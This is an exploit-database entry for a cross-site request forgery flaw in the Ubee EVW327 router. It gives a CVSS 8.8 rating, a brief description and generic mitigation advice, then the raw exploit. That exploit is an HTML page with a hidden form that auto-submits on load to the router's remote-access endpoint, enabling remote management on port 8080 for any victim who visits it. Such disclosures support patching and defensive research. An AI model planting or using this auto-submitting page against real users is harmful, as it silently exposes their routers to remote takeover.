header-logo
Suggest Exploit
vendor:
EVW327
by:
lated
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: EVW327
Affected Version From: EVW327
Affected Version To: EVW327
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2021

Ubee EVW327 – ‘Enable Remote Access’ Cross-Site Request Forgery (CSRF)

This exploit enables remote access on Ubee EVW327 routers by exploiting a Cross-Site Request Forgery (CSRF) vulnerability. The exploit is executed by submitting a POST request to the router's web interface with the parameters RemoteAccessEnable, RemoteAccessPort, and ApplyRemoteEnableAction set to 1. This will enable remote access on the router and open port 8080.

Mitigation:

To mitigate this vulnerability, the router should be configured to only accept requests from trusted sources. Additionally, the router should be configured to only accept requests from secure protocols such as HTTPS.
Source

Exploit-DB raw data:

# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) 
# Date: 2021-05-30
# Exploit Author: lated
# Vendor Homepage: https://www.ubeeinteractive.com
# Version: EVW327

<html>
	<body>
		<form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST">
			<input type="hidden" name="RemoteAccessEnable" value="1"/>
			<input type="hidden" name="RemoteAccessPort" value="8080"/>
			<input type="hidden" name="ApplyRemoteEnableAction" value="1"/>
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>